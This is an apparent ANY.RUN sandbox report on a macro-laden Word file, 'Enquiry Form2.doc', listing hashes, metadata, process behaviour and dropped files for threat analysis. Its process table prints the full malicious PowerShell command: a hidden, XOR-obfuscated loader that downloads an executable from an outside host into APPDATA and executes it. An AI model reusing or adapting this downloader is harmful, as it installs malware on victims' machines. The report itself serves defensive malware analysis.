analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Enquiry Form2.doc

Full analysis: https://app.any.run/tasks/b6157c84-cc16-441e-b4ab-3c37a73dac6e
Verdict: Malicious activity
Analysis date: January 23, 2019, 00:35:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: bfa7ab, Subject: fe4f2, Keywords: Harezm, Harezm, knowledge, Abbasi, Darlhikme, astronomy, math, Comments: Harezm was born in Harezm in 780. He then went to Baghdad, the center of knowledge for his period, to learn science. When Abbasi Halifesi Me'mun gave him the administration of the library (Darlhikme) he founded in Baghdad, he was able to examine the sources of mathematics and astronomy for a long time., Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 22 18:53:00 2019, Last Saved Time/Date: Tue Jan 22 18:53:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
MD5:

4E0EA1B364B767412D232D69FE7C00CC

SHA1:

AB9D5565B6078D787D68575A06324635309B049D

SHA256:

F98959E5FFED9CCEFEFE81B007EC3AD95A30A50778846FADD694F8D7DCDA0AED

SSDEEP:

384:38iS8px8SMDOKLv0MlE18cpkWUF3OV919O3ohk/C6onPmZgwB2N0jszt7:n3yv9doC/CFnuZEX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2824)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2824)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3932)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2824)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2824)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: bfa7ab
Subject: fe4f2
Author: -
Keywords: Harezmî, Harezm, knowledge, Abbasi, Darülhikme, astronomy, math
Comments: Harezmî was born in Harezm in 780. He then went to Baghdad, the center of knowledge for his period, to learn science. When Abbasi Halifesi Me'mun gave him the administration of the library (Darülhikme) he founded in Baghdad, he was able to examine the sources of mathematics and astronomy for a long time.
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:01:22 18:53:00
ModifyDate: 2019:01:22 18:53:00
Pages: 1
Words: -
Characters: -
Security: None
CodePage: Windows Latin 1 (Western European)
Bytes: 11000
Lines: -
Paragraphs: -
CharCountWithSpaces: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: bfa7ab
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2824"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Enquiry Form2.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3932"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile function zd6125 { param($f44597) $m31e15 = "x813bb9" $pec93 = "" for ($i = 0; $i -lt $f44597.length; $i+=2) { $j56535f = [convert]::ToByte($f44597.Substring($i, 2), 16) $pec93 += [char]($j56535f -bxor $m31e15[($i / 2) % $m31e15.length]) } return $pec93 } $u31363 = zd6125("0d4b585d05426a014b45560f5934724d425a0c05192b414247070f172a4d5f470b0f5c56715f47071056086b5441140b5a1d4b0a3e68124c1a545850420155194b421313565b4100520a6f68427532111342421958181168260e553155415c1016115a5354410c07554b0a131a3f6f3358181113424219584844510e0b5a584b4552160b5a585d494707105758715f4732164b587f54473210561b79555710074a0b10785d16324d0a18597e0d064c145d1d1311164b115656131210561b76505e074b027532111342421958181168260e553155415c1016115a5354410c07554b0a131a3f6f3358181113424219584844510e0b5a584b4552160b5a585d494707105758715f4732164b58745e52062e501a4a50411b4a4a0c4a585d0542571955541a596f33581811134242195863755f0e2b54085743474a40521d4a5f560e510b5a116c3e684219581811134242490d5a5d5a01424a0c59455a01425c004c54410c425b17575d13340b4b0c4d505f3210560c5d52474a2b570c684541420e49395c554107114a5418647a0c16690c4a1157153150025d1d13170b570c18575f2c074e284a5e4707014d54185e4616424c115645130e125f14775d573210560c5d52474b59347218111342421958186a770e0e7015485e41164a1b335d435d070e0a4a16555f0e4015587d5f47101b6917515f47425f195a6a455f2f0d4f1d75545e0d10405a141160071675194b45761010560a180c130403550b5d186e6f6819581811134242190b4c50470b01191d404556100c190e575857422f560e5d7c560f0d4b0110785d16324d0a18555611161558715f4732164b584b43504e4250164c11400b185c51033c396f681958181113424219084d535f0b01190b4c50470b0119115645131b530b4f0106514a4b347218111342421958184a3e684219581811134242195818117a0c16690c4a11545a535d4d0d50135f42751759557f0b004b194a481b18060f490a041b4053004d0d050157030d1b08070657530d5a1118086f681958181113424219581811130b0419505f090206570c19180c0e422b570c6845414c385c0a57183e68421958181113424219581811486f68195818111342421958181113424219584a544717105758090a3e684219581811134242195818114e6f68347218111342421958181113424270164c61471042541e5900060304194518765616324b175b705706105c0b4b19545a535d4d0d501f42185d4e0903064a400a410d04075057584b090102575a084e0f500756570c480c010456001b51110a3e684219581811134242195818115a044211155e500257035f58050c132b0c4d284c431d38074b17113c394242195818111342421958184a3e68421958181113424219581811134242190a5d4546100c1949033c394242195818111342421958184c3e686f335818111342421958181113423770164c614710425d0f6b58490742045810647a0c16690c4a1806596f335818111342421958181113421750164c116907105658051103596f335818111342421958181113420b5f581010650b104d0d595d63100d4d1d5b451b0f0458490d50554e425d0f6b5849074e19484005034e42560d4c116907105651113c394242195818111342421958184a3e68421958181113424219581811134242190a5d4546100c1949033c394242195818111342421958184c3e68421958181113424219581811711b165c2365116303165a10180c13194209000b001f4252411e5e1d13521a0048184c086f681958181113424219581811132b0c4d284c4313170c541956505407066917515f4707101945187c5210115119541f720e0e561b70765f0d00581410021a596f335818111342421958181113422f580a4b59520e4c7a1748481b32034d1b501d13524e190d565c520c035e1d5c615c0b0c4d1d4a1d13514b027532111342421958181113424219355747562f0754174a481b0f0458490d505542491948400103530015584d5f5e030c581f5d55630d0b570c5d431f42511043353b1342421958181113424219584a544717105758080a3e684219581811134242447532383a12175b145152131116580c51521311164b1156561318060f490a041b11164b1156561311164b3156183e684219581811134242427532383a6b114d0a515f5442170a4b0102135f421b000000000000005a033c394242195818111342421958184247100b571f185c55545b5b4b59110e42314d0a515f544c2754084c48086f68195818111342421958181113040d4b5810585d164250580511035942505804114016107016167d560c054d1003115a424904580a183e68421958181113424219581811486f68195818111342421958181113424219585a4847074254410f500b425f193b575f4507104d566c5e711b165c504b45412b0c172b4d5340161050165f195a4e420b51141102544b027532111342421958181113424219581811130f040f415a02524249045810525b03101050550804035a1926184400515b0a231058134d420b5118141317510a410b1f7f070c5e0c506c1a596f335818111342421958181113421f3472353b1342421958181113424219584a5447171057585557055b000a19033c3942421958181113421f347245") Add-Type -TypeDefinition $u31363 [q4b98c9]::y12797b() If (test-path $env:APPDATA + '\c36e4.exe') {Remove-Item $env:APPDATA + '\c36e4.exe'}; $v8343 = New-Object System.Net.WebClient; $v8343.Headers['User-Agent'] = 'v8343'; $v8343.DownloadFile('https://ghigalal.com/jay22.exe', $env:APPDATA + '\c36e4.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\c36e4.exe'); Stop-Process -Id $Pid -ForceC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 408
Read events
1 013
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2824WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9967.tmp.cvr
MD5:
SHA256:
3932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WE2ROBNQ98SGS0L24BI8.temp
MD5:
SHA256:
2824WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF98DD0CBF9C6355CA.TMP
MD5:
SHA256:
2824WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DCD3699E-722F-4FA5-B3C0-39F92F2E5623}.tmp
MD5:
SHA256:
2824WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0F986474-99CF-4613-823E-0303F8F32E81}.tmp
MD5:
SHA256:
3932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2824WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:32B1C4E7517012FB32BB1E80577B362C
SHA256:7114B9DABF63CC741025E24D1FB321B980BC7F86AEC6447C64DF48E86174627B
3932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a59c.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2824WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$quiry Form2.docpgc
MD5:1490E1AFEAE4E0169D1193D4B784EEA4
SHA256:61C7804317E18B0099183A86AB1CC7999C1B3E18363E59C3D1BE6C85668F439E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info